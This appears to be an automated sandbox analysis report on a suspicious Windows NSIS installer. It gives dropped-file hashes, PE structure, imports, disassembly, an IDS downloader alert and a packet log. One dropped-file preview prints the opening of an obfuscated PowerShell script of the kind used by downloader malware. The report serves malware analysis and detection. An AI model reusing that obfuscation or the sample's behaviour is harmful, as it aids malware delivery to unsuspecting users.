                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):300402
                                                                                              Entropy (8bit):7.750350130002499
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:bv+b9bmrrv8K5/t6Zv2iJG10Vt1e3S9COPHivY7xjjL1h9WDKEUMu+nBN:bGbmD8K51B2GGb1iS7PHiv0RVoYL+BN
                                                                                              MD5:2FD0FD06BDBD0BEB53C441C78443B0FD
                                                                                              SHA1:AFE12625E85BC7E7CEBC5C5A7D5DB570E266A74C
                                                                                              SHA-256:5857C0C22F7CB938708A342BAC1F11D5F02AE07062A91CB2E47F7BD3A1CA8F2D
                                                                                              SHA-512:1C44D57A722272B0B020051C1CF0A0F0A16AFCC7B6FF8D822C150F046DAE4E2F3EF5E7471056E19E7265C8235F6B57BEEC4983887A2F26DF8E4C51F100A4020E
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                                                                                              Category:dropped
                                                                                              Size (bytes):486421
                                                                                              Entropy (8bit):1.2470433609131586
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:p9ffEEX6My2RPkr6vyxsgBVdhrF8pGQkuxMSmLgnrL94:bffg2CJbdlFhh2Mwl4
                                                                                              MD5:858C7D246EC84B37359FDE23A9F8898A
                                                                                              SHA1:2046EFB2E9421F1F1C0CABA9F0D7ECCAD1F4AE0F
                                                                                              SHA-256:100C199A129F94FB16BDD51943FB691AB055CEA690088691C0F989D4C1C75884
                                                                                              SHA-512:547AA46E6279DD8DF920C2BF21B5A98B47F8B2F81E32FB36678119BC9510CA7D358C38C63E46E71285B76236D46D515CFE7C4DEA37660AE63E533AB78878ABBB
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):327732
                                                                                              Entropy (8bit):1.2609335393847756
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:rbmwczlydY1vPDT6+VOPnd7avS0bYT7bUkf0+VNt8xT70sob8aN/qfizqd71OFNj:sQdCVXhCo3Vxd/SRgV133ZBLlo
                                                                                              MD5:622032628F068FE10CC2E51D0502CC9A
                                                                                              SHA1:5AE897F10B51533C20489B755F4395FCED7EB67C
                                                                                              SHA-256:840F31C02A7A8CA755C4CD53619D9F93BB42848DD334B25A0A3C72B13F5753F4
                                                                                              SHA-512:2E5C98D7E3FE856D22381B2B97BAC5DF50C82859CB62DCF1D2FE3386B79D96446887FECB59D43F924200532399307E3846DDECA33FB87A286ADD5E6CEFC10637
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):433848
                                                                                              Entropy (8bit):1.255481788885247
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:8agBmxdiio94Vue1rGruEhQHTvyGPHzfrm75zidpc8oUH392slzddIRzyP98UmYu:NgKjnn/NnW5hQAPAfMqoDH+bI
                                                                                              MD5:7586252625434A405256063977B84D0D
                                                                                              SHA1:BA800F4510A4940F6EA11F866E3F4AF9805BDFD4
                                                                                              SHA-256:5AFA5BC29281632F196999E16D8F4B26F2C14EC6A8A5F589DC5932B6DE78A2A7
                                                                                              SHA-512:613E03C6EC8DFBE0B2B6A450B30B932157FE40121E6A7E4AE9FB188193AB6E5D3CA044F30351A3E969FD84BAC8BC7AD2B7DD5E9D0BB091FEDE0546CC9E3A3856
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):327124
                                                                                              Entropy (8bit):1.2472891497347776
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:qw1bcEnP59OCTltLumdIdNK2mkVYYHN44jjU5S6EP1KRuM/VTCo0oXATL4bYZcOO:jucypY8Gyju3O4/iALDvWJTAnjPqqaO
                                                                                              MD5:0EC84A842970A2C0B04893F66217F733
                                                                                              SHA1:E100ACDACE598C27B00E0AF658306942A70228FC
                                                                                              SHA-256:6B3552FC5295BE3AE9FADD8AFA8A06103BD60DDB6E0BE924C61B346895505A7A
                                                                                              SHA-512:27270395859FEF2B270B7C2C70FA587BAF4FDCFF742DA93B6F7D1B0B82B5B1FF0BA9004BD3B825A9A62FAE75FB0F792A176ECE980529B61A2FEADE958B8B0BFB
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (4151), with CRLF, LF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):72178
                                                                                              Entropy (8bit):5.161150728391685
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:46DE7jedqYs72dYAWmfVh7ZVuKgsJ/5f/P+SYpgVZjswGbRch4Pt6C:zDE2dqX+YzmfTuPsZ5fBPVZjswocSR
                                                                                              MD5:48C389453F2D33288CC98CEBDF2CB813
                                                                                              SHA1:5852C4C8747D5B0A12DA630CC7710556614DDDDB
                                                                                              SHA-256:9FF2EF5992F74954230F92775E391F7FB06989860E4573D609015A4B4D219CA0
                                                                                              SHA-512:064DB1A1E93236EB969F8D666135564EA2EDA419867F3AB0831081659F499A61490CB608DC71E3B17F91D9754B47C3FB9FEEC52D18DF34FC9FE054BE8587B1F8
                                                                                              Malicious:false
                                                                                              Preview:$Vaabensmuglingernes229=$Videreuddannelsens;.....<#Midterste Spaghettistrop Myth #>..<#Tilegnelser Klbedes Ministry Skitsebgernes #>..<#Artisters christiansfelds Fordanskning #>..<#Nullermand Raastofforbrugenes Bestikkelsers Yawniness Dosimetries Safters #>..<#Edelhards Nusle Evangelieteksternes Ejects Trophology Slummiest Shibboleter #>..<#Refried Costopneumopexy Blokken Kontohaverne Byggemodnes Bught Sejlgarnsngler #>...$Chuffing = @'.Skiffer.Insiste$ B sparSMinell,pFortr,la Na,riud IgnobliB.faldpcOksekdeiDamprutfTffelhelAflaasnoduellerrUhensigaBkautonlCrouchi=Slut un$FalsityR boligmeTradeabeStocka v S perban rvimocUge,ortuTndinguaNonbroot BefrieeR.allns; Bisulf.Gematr,fRegnefeuP.issernUfo nufcSommerbtBloomssiCikadenoalveolonDalre,s Levia hAUnfortufNektaret uperimo Gasko,pNonstim Barrik( S uder$Sk,llevVRes rinaOpsnusegBigamsnr MiguelaTriangenAfloesetAfk.ydsiArriebosUnlaboreMer ant, Boresk$VarisciV,ormidli tvrelsn T arepdChaliniaFilm,dklRefntryo Jim.ieoPerunpa) Sermon S ftdri{Progno
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0, imaginary
                                                                                              Category:dropped
                                                                                              Size (bytes):462783
                                                                                              Entropy (8bit):1.2514895750557933
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:gR0px6Iw5kvIV8FuWk8mGWwi1BoFIN8oYd:jmIwavC6utxgIjYd
                                                                                              MD5:77218C2134D28A666F2FDEAA5E452489
                                                                                              SHA1:16E2234D9C2F4E4265D1362887B40149B9E31823
                                                                                              SHA-256:A901A3525DC18A4A9E6EF655931252D8258D954D419FCE81668F251C8EF54EE5
                                                                                              SHA-512:AFE9F39C392A6DE29B551393CB032534D04AA18B82E747406A23828DE7B4088FBA3045F0DD8ECC37C3A4FE45125605C0504EA8A1C38DA429624A35753E8E3ED2
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):457562
                                                                                              Entropy (8bit):1.2482312628496608
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:2jMpNhAlrasgHvP3V5s9ASYucRtPbRS9y:hpNhX93V5sOSTczjB
                                                                                              MD5:E4AC954ED484155B2A165BF00B1E8A4F
                                                                                              SHA1:21ACBAC21538E0258892381807BBE19524DA02E3
                                                                                              SHA-256:3078C30C80C29C473A796C4E1FE5F89A175D9B23FC88DBCD0262D93B0C67BEED
                                                                                              SHA-512:A63E484A5CF926E2484B69210BE047B1F90DAC2A0F813E33D2F1B507CC45AF21169AEC9EBEAA6152CDB2448BEE7B09D82E4427C7596E864B09A7A15560D323AC
                                                                                              Malicious:false
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Entropy (8bit):7.5565849180901195
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:LMSxhK1u8Z.exe
                                                                                              File size:1'048'752 bytes
                                                                                              MD5:f2827f013a265de94993c62bf9756b00
                                                                                              SHA1:9cc4cc403434e08c9c2e2ab312980cad6b2470ca
                                                                                              SHA256:fe05b02fda8dc707ceb4143b4a2e4d6553d5410f226907cf0ae318b54edf28b2
                                                                                              SHA512:02af8c436750df4e9c36ce4e93d4f263563bbc6052693441b82cc2e970fafca557039fae92cee0493ecd28d433c7c8594433421ced08f033ed8fd317b12e090b
                                                                                              SSDEEP:24576:2j+EpTNHhl/G2yQhhdR/mwmNG3Ap137dboaPjyMi76KbP:S+OT5vG2y2hvXt3IRM+i76y
                                                                                              TLSH:8E252342FAD190AED4B64632CA5BD63E047AED5CDC400613A7643F4F797AA82AC3435F
                                                                                              Icon Hash:0d4f7fd151493b07
                                                                                              Entrypoint:0x4031dd
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:true
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x519965E1 [Sun May 19 23:53:05 2013 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:7fd61eafe142870d6d0380163804a642
                                                                                              Signature Valid:false
Signature Issuer:CN=Snobbismens, O=Snobbismens, L=Besançon, C=FR
                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                              Error Number:-2146762487
Not Before:13/07/2024 08:23:03
Not After:13/07/2027 08:23:03
Subject Chain
• CN=Snobbismens, O=Snobbismens, L=Besançon, C=FR
                                                                                              Version:3
                                                                                              Thumbprint MD5:B4D054FDC4E6394CF0C3F6C9CEF374D6
                                                                                              Thumbprint SHA-1:1D54D11202914B6E52F124CA4CBDC2933D6CCEC8
                                                                                              Thumbprint SHA-256:A0F5D37522682D51C6953814803EC1FBD1BE02B5799C3689AE8E71EA223D1617
                                                                                              Serial:5835A1A469993DF5C03E2F2A2279AE0FB77356F9
                                                                                              Instruction
                                                                                              sub esp, 000002D4h
                                                                                              push ebx
                                                                                              push ebp
                                                                                              push esi
                                                                                              push edi
                                                                                              push 00000020h
                                                                                              xor ebp, ebp
                                                                                              pop esi
                                                                                              mov dword ptr [esp+18h], ebp
                                                                                              mov dword ptr [esp+10h], 0040A2D8h
                                                                                              mov dword ptr [esp+14h], ebp
                                                                                              call dword ptr [00408034h]
                                                                                              push 00008001h
                                                                                              call dword ptr [00408134h]
                                                                                              push ebp
                                                                                              call dword ptr [004082ACh]
                                                                                              push 00000008h
                                                                                              mov dword ptr [00434F58h], eax
                                                                                              call 00007FF3C8D79E85h
                                                                                              mov dword ptr [00434EA4h], eax
                                                                                              push ebp
                                                                                              lea eax, dword ptr [esp+34h]
                                                                                              push 000002B4h
                                                                                              push eax
                                                                                              push ebp
                                                                                              push 0042B1B8h
                                                                                              call dword ptr [0040817Ch]
                                                                                              push 0040A2C0h
                                                                                              push 00433EA0h
                                                                                              call 00007FF3C8D79AF0h
                                                                                              call dword ptr [00408138h]
                                                                                              mov ebx, 0043F000h
                                                                                              push eax
                                                                                              push ebx
                                                                                              call 00007FF3C8D79ADEh
                                                                                              push ebp
                                                                                              call dword ptr [0040810Ch]
                                                                                              cmp word ptr [0043F000h], 0022h
                                                                                              mov dword ptr [00434EA0h], eax
                                                                                              mov eax, ebx
                                                                                              jne 00007FF3C8D76FFAh
                                                                                              push 00000022h
                                                                                              mov eax, 0043F002h
                                                                                              pop esi
                                                                                              push esi
                                                                                              push eax
                                                                                              call 00007FF3C8D7954Ch
                                                                                              push eax
                                                                                              call dword ptr [00408240h]
                                                                                              mov dword ptr [esp+1Ch], eax
                                                                                              jmp 00007FF3C8D770B9h
                                                                                              push 00000020h
                                                                                              pop edx
                                                                                              cmp cx, dx
                                                                                              jne 00007FF3C8D76FF9h
                                                                                              inc eax
                                                                                              inc eax
                                                                                              cmp word ptr [eax], dx
                                                                                              je 00007FF3C8D76FEBh
                                                                                              add word ptr [eax], 0000h
                                                                                              Programming Language:
                                                                                              • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x85a0 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x55000 | 0x2eba8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xff7a8 | 0x908 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6010 | 0x6200 | c51ae685760de510818d22f29d66b8b0 | False | 0.6646603954081632 | data | 6.440168137798694 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1460 | 0x1600 | 24345ed7377f4b4663284282b5ef48b3 | False | 0.42134232954545453 | data | 4.947177345443015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2af98 | 0x600 | dc268be7d1af6fdfcd38d44492cfdaf5 | False | 0.486328125 | data | 3.791234740340295 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x35000 | 0x20000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x55000 | 0x2eba8 | 0x2ec00 | bdebbd0274fda95ee828978bf6f6217f | False | 0.3979413853609626 | data | 3.9167771947187013 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x55388 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.364929610789069
RT_ICON | 0x65bb0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.403011351692243
RT_ICON | 0x6f058 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | English | United States | 0.4087218045112782
RT_ICON | 0x75840 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.4187615526802218
RT_ICON | 0x7acc8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.40298771846953235
RT_ICON | 0x7eef0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.4413900414937759
RT_ICON | 0x81498 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4702157598499062
RT_ICON | 0x82540 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5204918032786885
RT_ICON | 0x82ec8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5824468085106383
RT_DIALOG | 0x83330 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x83430 | 0x11c | data | English | United States | 0.6091549295774648
RT_DIALOG | 0x83550 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x83618 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x83678 | 0x84 | data | English | United States | 0.7272727272727273
RT_VERSION | 0x83700 | 0x1d8 | data | English | United States | 0.5317796610169492
RT_MANIFEST | 0x838d8 | 0x2cb | XML 1.0 document, ASCII text, with very long lines (715), with no line terminators | English | United States | 0.5664335664335665
DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, MultiByteToWideChar, FindClose, MulDiv, ReadFile, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T03:52:30.599048+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49736 | 172.217.16.206 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                              Jan 11, 2025 03:52:31.836612940 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:31.836715937 CET44349738172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.836950064 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:31.837681055 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:31.837711096 CET44349738172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.949893951 CET5345653192.168.2.4162.159.36.2
                                                                                              Jan 11, 2025 03:52:31.954725981 CET5353456162.159.36.2192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.954804897 CET5345653192.168.2.4162.159.36.2
                                                                                              Jan 11, 2025 03:52:31.959683895 CET5353456162.159.36.2192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.423290014 CET5345653192.168.2.4162.159.36.2
                                                                                              Jan 11, 2025 03:52:32.428533077 CET5353456162.159.36.2192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.428597927 CET5345653192.168.2.4162.159.36.2
                                                                                              Jan 11, 2025 03:52:32.472996950 CET44349738172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.473088980 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:32.473656893 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:32.473685026 CET44349738172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.473880053 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:32.473891973 CET44349738172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.858211994 CET44349738172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.858494043 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:32.858520031 CET44349738172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.858592033 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:32.858592987 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:32.858592987 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:32.858634949 CET44349738172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.858704090 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:32.909380913 CET53459443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:32.909450054 CET44353459172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.909523964 CET53459443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:32.909846067 CET53459443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:32.909868002 CET44353459172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:33.558783054 CET44353459172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:33.558866978 CET53459443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:33.559442043 CET53459443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:33.559475899 CET44353459172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:33.559638977 CET53459443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:33.559653997 CET44353459172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:33.991897106 CET44353459172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:33.991967916 CET53459443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:33.992005110 CET44353459172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:33.992048025 CET53459443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:33.992140055 CET44353459172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:33.992196083 CET53459443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:33.992261887 CET44353459172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:33.992346048 CET44353459172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:33.992364883 CET53459443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:33.992393017 CET53459443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:33.992899895 CET53459443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:33.992919922 CET44353459172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:33.992938042 CET53459443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:33.992961884 CET53459443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:34.115974903 CET53460443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:34.116041899 CET44353460172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:34.116311073 CET53460443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:34.116769075 CET53460443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:34.116782904 CET44353460172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:34.775823116 CET44353460172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:34.777946949 CET53460443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:34.778580904 CET53460443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:34.778594971 CET44353460172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:34.783683062 CET53460443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:34.783694983 CET44353460172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:35.165949106 CET44353460172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:35.166034937 CET53460443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:35.166059017 CET44353460172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:35.166125059 CET53460443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:35.166239023 CET53460443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:35.166337967 CET44353460172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:35.166665077 CET53460443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:35.180408001 CET53461443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:35.180469990 CET44353461172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:35.180565119 CET53461443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:35.180815935 CET53461443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:35.180833101 CET44353461172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:35.839027882 CET44353461172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:35.839301109 CET53461443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:35.850363016 CET53461443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:35.850405931 CET44353461172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:35.850548029 CET53461443192.168.2.4172.217.16.129
